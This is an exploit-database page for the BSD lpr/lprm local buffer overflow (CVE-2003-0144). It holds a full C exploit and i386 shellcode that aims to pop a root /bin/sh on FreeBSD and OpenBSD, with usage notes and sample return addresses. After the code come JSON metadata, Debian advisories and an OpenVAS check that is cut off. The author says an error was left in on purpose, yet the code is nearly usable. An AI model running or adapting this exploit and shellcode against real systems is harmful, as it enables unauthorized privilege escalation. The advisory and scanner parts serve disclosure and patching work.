Search...

BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1

1998-04-22T00:00:00

ID EDB-ID:22331
Type exploitdb
Reporter Niall Smart
Modified 1998-04-22T00:00:00

Description

BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/7025/info

It has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.

/*
   lprm-bsd.c - Exploit for lprm vulnerability in
                OpenBSD and FreeBSD-stable

   k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.

   The original version of this file contains a blatant error
   which anyone who is capable of understanding C will be able
   to locate and remove.  Please do not distribute this file
   without this idiot-avoidance measure.

   Typical egg on FreeBSD: 0xEFBFCFDF
   Typical egg on OpenBSD: 0xEFBFD648

   The exploit might take a while to drop you to a root shell
   depending on the timeout ("tm" capability) specified in the
   printcap file.
*/

#include &lt;sys/types.h&gt;
#include &lt;pwd.h&gt;
#include &lt;err.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;

extern void     BEGIN_SC();
extern void     END_SC();

int
main(int argc, char** argv)
{
        char            buf[4096];
        struct passwd*  pw;
        char*           cgstr;
        char*           cgbuf;
        char*           printer;
        char*           printcaps[] = { "/etc/printcap", 0 };
        int             sc_size;  /* size of shell code */
        int             P;        /* strlen(RP) + strlen(person) */
        unsigned        egg;      /* value to overwrite saved EIP with */

        if (argc != 3) {
                fprintf(stderr, "usage: %s &lt;printername&gt; &lt;egg&gt;\n", argv[0]);
                exit(0);
        }

        if ( (pw = getpwuid(getuid())) == NULL)
                errx(1, "no password entry for your user-id");

        printer = argv[1];
        egg = (unsigned) strtoul(argv[2], NULL, 0);

        if (cgetent(&cgstr, printcaps, printer) &lt; 0)
                errx(1, "can't find printer: %s", printer);

        if (cgetstr(cgstr, "rm", &cgbuf) &lt; 0 || cgbuf[0] == '\0')
                errx(1, "printer is not remote: %s", printer);

        if (cgetstr(cgstr, "rp", &cgbuf) &lt; 0)
                cgbuf = "lp";

        sc_size = (char*) END_SC - (char*) BEGIN_SC;

        /* We can append 1022 bytes to whatever is in the buffer.
           We need to get up to 1032 bytes to reach the saved EIP,
           so there must be at least 10 bytes placed in the buffer
           by the snprintf on line 337 of rmjob.c and the subsequent
           *cp++ = '\0';  3 = ' ' + ' ' + '\5' */

        if ( (P = (strlen(pw-&gt;pw_name) + strlen(cgbuf))) &lt; 7)
                errx(1, "your username is too short");

        fprintf(stderr, "P = %d\n", P);
        fprintf(stderr, "shellcode = %d bytes @ %d\n", sc_size, 1028 - P - 3 - 12 - sc_size);
        fprintf(stderr, "egg = 0x%X@%d\n", egg, 1028 - P - 3);

        /* fill with NOP */
        memset(buf, 0x90, sizeof(buf));
        /* put letter in first byte, this fucker took me eight hours to debug. */
        buf[0] = 'A';
        /* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */
        memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);
        /* finally, set egg and null terminate */
        *((int*)&buf[1028 - P - 3]) = egg;
        buf[1022] = '\0';

        memset(buf, 0, sizeof(buf));

        execl("/usr/bin/lprm", "lprm", "-P", printer, buf, 0);

        fprintf(stderr, "doh.\n");

        return 0;
}


/*
   shellcode.S - generic i386 shell code

   k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.
   Please send me platform-specific mods.

   Example use:

        #include &lt;stdio.h&gt;
        #include &lt;string.h&gt;

        extern void     BEGIN_SC();
        extern void     END_SC();

        int
        main()
        {
                char    buf[1024];

                memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);

                ((void (*)(void)) buf)();

                return 0;
        }

    gcc -Wall main.c shellcode.S -o main && ./main
*/


#if defined(__FreeBSD__) || defined(__OpenBSD__)
#define EXECVE          3B
#define EXIT            01
#define SETUID          17
#define SETEUID         B7
#define KERNCALL        int $0x80
#else
#error This OS not currently supported.
#endif

#define _EXECVE_A       CONCAT($0x555555, EXECVE)
#define _EXECVE_B       CONCAT($0xAAAAAA, EXECVE)
#define _EXIT_A         CONCAT($0x555555, EXIT)
#define _EXIT_B         CONCAT($0xAAAAAA, EXIT)
#define _SETUID_A       CONCAT($0x555555, SETUID)
#define _SETUID_B       CONCAT($0xAAAAAA, SETUID)
#define _SETEUID_A      CONCAT($0x555555, SETEUID)
#define _SETEUID_B      CONCAT($0xAAAAAA, SETEUID)

#define CONCAT(x, y)    CONCAT2(x, y)
#define CONCAT2(x, y)   x ## y

.global         _BEGIN_SC
.global         _END_SC

                .data
_BEGIN_SC:      jmp 0x4                 // jump past next two isns
                movl (%esp), %eax       // copy saved EIP to eax
                ret                     // return to caller
                xorl %ebx, %ebx         // zero ebx
                pushl %ebx              // sete?uid(0)
                pushl %ebx              // dummy, kernel expects extra frame pointer
                movl _SETEUID_A, %eax   //
                andl _SETEUID_B, %eax   // load syscall number
                KERNCALL                // make the call
                movl _SETUID_A, %eax    //
                andl _SETUID_B, %eax    // load syscall number
                KERNCALL                // make the call
                subl $-8, %esp          // push stack back up
                call -40                // call, pushing addr of next isn onto stack
                addl $53, %eax          // make eax point to the string
                movb %bl, 2(%eax)       // append '\0' to "sh"
                movb %bl, 11(%eax)      // append '\0' to "/bin/sh"
                movl %eax, 12(%eax)     // argv[0] = "sh"
                movl %ebx, 16(%eax)     // argv[1] = 0
                pushl %ebx              // push envv
                movl %eax, %ebx         //
                subl $-12, %ebx         // -(-12) = 12, avoid null bytes
                pushl %ebx              // push argv
                subl $-4, %eax          // -(-4) = 4, avoid null bytes
                pushl %eax              // push path
                pushl %eax              // dummy, kernel expects extra frame pointer
                movl _EXECVE_A, %eax    //
                andl _EXECVE_B, %eax    // load syscall number
                KERNCALL                // make the call
                pushl %eax              // push return code from execve
                pushl %eax              //
                movl _EXIT_A, %eax      // we shouldn't have gotten here, try and
                andl _EXIT_B, %eax      // exit with return code from execve
                KERNCALL                // JERONIMO!
                .ascii "shAA/bin/shBCCCCDDDD"
                //      01234567890123456789
_END_SC:

JSON Vulners Source

Initial Source

{"hash": "316e42f4d752b29f7f1c6e4791aae2f73a87d259f5d1cbf19ffee978039425fd", "id": "EDB-ID:22331", "lastseen": "2016-02-02T18:30:25", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/22331/", "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/7025/info\r\n\r\nIt has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.\r\n\r\n/*\r\n lprm-bsd.c - Exploit for lprm vulnerability in\r\n OpenBSD and FreeBSD-stable\r\n\r\n k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n\r\n The original version of this file contains a blatant error\r\n which anyone who is capable of understanding C will be able\r\n to locate and remove. Please do not distribute this file\r\n without this idiot-avoidance measure.\r\n\r\n Typical egg on FreeBSD: 0xEFBFCFDF\r\n Typical egg on OpenBSD: 0xEFBFD648\r\n\r\n The exploit might take a while to drop you to a root shell\r\n depending on the timeout (\"tm\" capability) specified in the\r\n printcap file.\r\n*/\r\n\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nextern void BEGIN_SC();\r\nextern void END_SC();\r\n\r\nint\r\nmain(int argc, char** argv)\r\n{\r\n char buf[4096];\r\n struct passwd* pw;\r\n char* cgstr;\r\n char* cgbuf;\r\n char* printer;\r\n char* printcaps[] = { \"/etc/printcap\", 0 };\r\n int sc_size; /* size of shell code */\r\n int P; /* strlen(RP) + strlen(person) */\r\n unsigned egg; /* value to overwrite saved EIP with */\r\n\r\n if (argc != 3) {\r\n fprintf(stderr, \"usage: %s <printername> <egg>\\n\", argv[0]);\r\n exit(0);\r\n }\r\n\r\n if ( (pw = getpwuid(getuid())) == NULL)\r\n errx(1, \"no password entry for your user-id\");\r\n\r\n printer = argv[1];\r\n egg = (unsigned) strtoul(argv[2], NULL, 0);\r\n\r\n if (cgetent(&cgstr, printcaps, printer) < 0)\r\n errx(1, \"can't find printer: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rm\", &cgbuf) < 0 || cgbuf[0] == '\\0')\r\n errx(1, \"printer is not remote: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rp\", &cgbuf) < 0)\r\n cgbuf = \"lp\";\r\n\r\n sc_size = (char*) END_SC - (char*) BEGIN_SC;\r\n\r\n /* We can append 1022 bytes to whatever is in the buffer.\r\n We need to get up to 1032 bytes to reach the saved EIP,\r\n so there must be at least 10 bytes placed in the buffer\r\n by the snprintf on line 337 of rmjob.c and the subsequent\r\n *cp++ = '\\0'; 3 = ' ' + ' ' + '\\5' */\r\n\r\n if ( (P = (strlen(pw->pw_name) + strlen(cgbuf))) < 7)\r\n errx(1, \"your username is too short\");\r\n\r\n fprintf(stderr, \"P = %d\\n\", P);\r\n fprintf(stderr, \"shellcode = %d bytes @ %d\\n\", sc_size, 1028 - P - 3 - 12 - sc_size);\r\n fprintf(stderr, \"egg = 0x%X@%d\\n\", egg, 1028 - P - 3);\r\n\r\n /* fill with NOP */\r\n memset(buf, 0x90, sizeof(buf));\r\n /* put letter in first byte, this fucker took me eight hours to debug. */\r\n buf[0] = 'A';\r\n /* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */\r\n memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);\r\n /* finally, set egg and null terminate */\r\n *((int*)&buf[1028 - P - 3]) = egg;\r\n buf[1022] = '\\0';\r\n\r\n memset(buf, 0, sizeof(buf));\r\n\r\n execl(\"/usr/bin/lprm\", \"lprm\", \"-P\", printer, buf, 0);\r\n\r\n fprintf(stderr, \"doh.\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n\r\n/*\r\n shellcode.S - generic i386 shell code\r\n\r\n k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n Please send me platform-specific mods.\r\n\r\n Example use:\r\n\r\n #include <stdio.h>\r\n #include <string.h>\r\n\r\n extern void BEGIN_SC();\r\n extern void END_SC();\r\n\r\n int\r\n main()\r\n {\r\n char buf[1024];\r\n\r\n memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);\r\n\r\n ((void (*)(void)) buf)();\r\n\r\n return 0;\r\n }\r\n\r\n gcc -Wall main.c shellcode.S -o main && ./main\r\n*/\r\n\r\n\r\n#if defined(__FreeBSD__) || defined(__OpenBSD__)\r\n#define EXECVE 3B\r\n#define EXIT 01\r\n#define SETUID 17\r\n#define SETEUID B7\r\n#define KERNCALL int $0x80\r\n#else\r\n#error This OS not currently supported.\r\n#endif\r\n\r\n#define _EXECVE_A CONCAT($0x555555, EXECVE)\r\n#define _EXECVE_B CONCAT($0xAAAAAA, EXECVE)\r\n#define _EXIT_A CONCAT($0x555555, EXIT)\r\n#define _EXIT_B CONCAT($0xAAAAAA, EXIT)\r\n#define _SETUID_A CONCAT($0x555555, SETUID)\r\n#define _SETUID_B CONCAT($0xAAAAAA, SETUID)\r\n#define _SETEUID_A CONCAT($0x555555, SETEUID)\r\n#define _SETEUID_B CONCAT($0xAAAAAA, SETEUID)\r\n\r\n#define CONCAT(x, y) CONCAT2(x, y)\r\n#define CONCAT2(x, y) x ## y\r\n\r\n.global _BEGIN_SC\r\n.global _END_SC\r\n\r\n .data\r\n_BEGIN_SC: jmp 0x4 // jump past next two isns\r\n movl (%esp), %eax // copy saved EIP to eax\r\n ret // return to caller\r\n xorl %ebx, %ebx // zero ebx\r\n pushl %ebx // sete?uid(0)\r\n pushl %ebx // dummy, kernel expects extra frame pointer\r\n movl _SETEUID_A, %eax //\r\n andl _SETEUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n movl _SETUID_A, %eax //\r\n andl _SETUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n subl $-8, %esp // push stack back up\r\n call -40 // call, pushing addr of next isn onto stack\r\n addl $53, %eax // make eax point to the string\r\n movb %bl, 2(%eax) // append '\\0' to \"sh\"\r\n movb %bl, 11(%eax) // append '\\0' to \"/bin/sh\"\r\n movl %eax, 12(%eax) // argv[0] = \"sh\"\r\n movl %ebx, 16(%eax) // argv[1] = 0\r\n pushl %ebx // push envv\r\n movl %eax, %ebx //\r\n subl $-12, %ebx // -(-12) = 12, avoid null bytes\r\n pushl %ebx // push argv\r\n subl $-4, %eax // -(-4) = 4, avoid null bytes\r\n pushl %eax // push path\r\n pushl %eax // dummy, kernel expects extra frame pointer\r\n movl _EXECVE_A, %eax //\r\n andl _EXECVE_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n pushl %eax // push return code from execve\r\n pushl %eax //\r\n movl _EXIT_A, %eax // we shouldn't have gotten here, try and\r\n andl _EXIT_B, %eax // exit with return code from execve\r\n KERNCALL // JERONIMO!\r\n .ascii \"shAA/bin/shBCCCCDDDD\"\r\n // 01234567890123456789\r\n_END_SC:", "objectVersion": "1.0", "cvelist": ["CVE-2003-0144"], "published": "1998-04-22T00:00:00", "osvdbidlist": ["7549"], "references": [], "reporter": "Niall Smart", "modified": "1998-04-22T00:00:00", "href": "https://www.exploit-db.com/exploits/22331/"}

{"cve": [{"lastseen": "2017-07-11T11:14:15", "references": ["http://www.debian.org/security/2003/dsa-267", "http://marc.info/?l=bugtraq&m=104714441925019&w=2", "ftp://patches.sgi.com/support/free/security/advisories/20030406-02-P", "https://exchange.xforce.ibmcloud.com/vulnerabilities/11473", "http://www.securityfocus.com/bid/7025", "http://www.mandriva.com/security/advisories?name=MDKSA-2003:059", "http://marc.info/?l=bugtraq&m=104690434504429&w=2", "http://www.debian.org/security/2003/dsa-275", "ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/010_lprm.patch", "http://www.novell.com/linux/security/advisories/2003_014_lprold.html"], "description": "Buffer overflow in the lprm command in the lprold lpr package on SuSE 7.1 through 7.3, OpenBSD 3.2 and earlier, and possibly other operating systems, allows local users to gain root privileges via long command line arguments such as (1) request ID or (2) user name.", "edition": 3, "reporter": "NVD", "published": "2003-03-31T00:00:00", "title": "CVE-2003-0144", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:15", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0144"], "scanner": [], "modified": "2017-07-10T21:29:27", "cpe": ["cpe:/o:openbsd:openbsd:2.4", "cpe:/a:lprold:lprold:3.0.48", "cpe:/o:openbsd:openbsd:3.1", "cpe:/o:openbsd:openbsd:2.9", "cpe:/o:openbsd:openbsd:2.6", "cpe:/o:openbsd:openbsd:2.2", "cpe:/o:openbsd:openbsd:2.8", "cpe:/o:freebsd:freebsd:2.2", "cpe:/o:openbsd:openbsd:3.0", "cpe:/o:freebsd:freebsd:2.2.3", "cpe:/o:openbsd:openbsd:2.1", "cpe:/o:freebsd:freebsd:2.2.5", "cpe:/o:freebsd:freebsd:2.2.2", "cpe:/o:bsd:lpr:0.48", "cpe:/o:openbsd:openbsd:2.0", "cpe:/o:bsd:lpr:2000-05-07", "cpe:/o:freebsd:freebsd:2.2.4", "cpe:/o:openbsd:openbsd:2.3", "cpe:/o:freebsd:freebsd:2.2.6", "cpe:/o:openbsd:openbsd:2.7", "cpe:/o:openbsd:openbsd:2.5", "cpe:/o:openbsd:openbsd:3.2"], "id": "CVE-2003-0144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0144", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:29:10", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48.orig", "arch": "src", "packageFilename": "lpr_0.48.orig.tar.gz", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "hppa", "packageFilename": "lpr_2000.05.07-4.3_hppa.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "m68k", "packageFilename": "lpr_0.48-1.2_m68k.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "ppc", "packageFilename": "lpr_2000.05.07-4.3_powerpc.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "i686", "packageFilename": "lpr_2000.05.07-4.3_i386.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "sparc", "packageFilename": "lpr_2000.05.07-4.3_sparc.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "ia64", "packageFilename": "lpr_2000.05.07-4.3_ia64.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "m68k", "packageFilename": "lpr_2000.05.07-4.3_m68k.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "mipsel", "packageFilename": "lpr_2000.05.07-4.3_mipsel.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "s390x", "packageFilename": "lpr_2000.05.07-4.3_s390.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "mips", "packageFilename": "lpr_2000.05.07-4.3_mips.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2.diff", "arch": "src", "packageFilename": "lpr_0.48-1.2.diff.gz", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "i686", "packageFilename": "lpr_0.48-1.2_i386.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "alpha", "packageFilename": "lpr_0.48-1.2_alpha.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07.orig", "arch": "src", "packageFilename": "lpr_2000.05.07.orig.tar.gz", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3.diff", "arch": "src", "packageFilename": "lpr_2000.05.07-4.3.diff.gz", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "src", "packageFilename": "lpr_0.48-1.2.dsc", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "src", "packageFilename": "lpr_2000.05.07-4.3.dsc", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "arm", "packageFilename": "lpr_2000.05.07-4.3_arm.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "arm", "packageFilename": "lpr_0.48-1.2_arm.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "ppc", "packageFilename": "lpr_0.48-1.2_powerpc.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2000.05.07-4.3", "arch": "alpha", "packageFilename": "lpr_2000.05.07-4.3_alpha.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "sparc", "packageFilename": "lpr_0.48-1.2_sparc.deb", "packageName": "lpr", "operator": "lt"}], "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.\n\nFor the stable distribution (woody) this problem has been fixed in version 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed in version 0.48-1.1.\n\nFor the unstable distribution (sid) this problem has been fixed in version 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.", "edition": 1, "reporter": "Debian", "published": "2003-03-24T00:00:00", "title": "lpr -- buffer overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-03-24T00:00:00", "id": "DSA-267", "href": "http://www.debian.org/security/dsa-267", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:26:35", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "i686", "packageFilename": "lpr-ppd_0.72-2.1_i386.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "arm", "packageFilename": "lpr-ppd_0.72-2.1_arm.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "src", "packageFilename": "lpr-ppd_0.72-2.1.dsc", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "m68k", "packageFilename": "lpr-ppd_0.72-2.1_m68k.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "hppa", "packageFilename": "lpr-ppd_0.72-2.1_hppa.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "sparc", "packageFilename": "lpr-ppd_0.72-2.1_sparc.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72.orig", "arch": "src", "packageFilename": "lpr-ppd_0.72.orig.tar.gz", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1.diff", "arch": "src", "packageFilename": "lpr-ppd_0.72-2.1.diff.gz", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "ppc", "packageFilename": "lpr-ppd_0.72-2.1_powerpc.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "s390x", "packageFilename": "lpr-ppd_0.72-2.1_s390.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "alpha", "packageFilename": "lpr-ppd_0.72-2.1_alpha.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "mips", "packageFilename": "lpr-ppd_0.72-2.1_mips.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "ia64", "packageFilename": "lpr-ppd_0.72-2.1_ia64.deb", "packageName": "lpr-ppd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.72-2.1", "arch": "mipsel", "packageFilename": "lpr-ppd_0.72-2.1_mipsel.deb", "packageName": "lpr-ppd", "operator": "lt"}], "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.\n\nFor the stable distribution (woody) this problem has been fixed in version 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd packages.\n\nFor the unstable distribution (sid) this problem has been fixed in version 0.72-3.\n\nWe recommend that you upgrade your lpr-ppd package immediately.", "edition": 1, "reporter": "Debian", "published": "2003-04-02T00:00:00", "title": "lpr-ppd -- buffer overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-04-02T00:00:00", "id": "DSA-275", "href": "http://www.debian.org/security/dsa-275", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:16", "references": [], "pluginID": "53344", "description": "The remote host is missing an update to lpr-ppd\nannounced via advisory DSA 275-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 275-1 (lpr-ppd)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53344", "id": "OPENVAS:53344", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_275_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 275-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd packages.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 0.72-3.\n\nWe recommend that you upgrade your lpr-ppd package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr-ppd\nannounced via advisory DSA 275-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20275-1\";\n\nif(description)\n{\n script_id(53344);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 275-1 (lpr-ppd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr-ppd\", 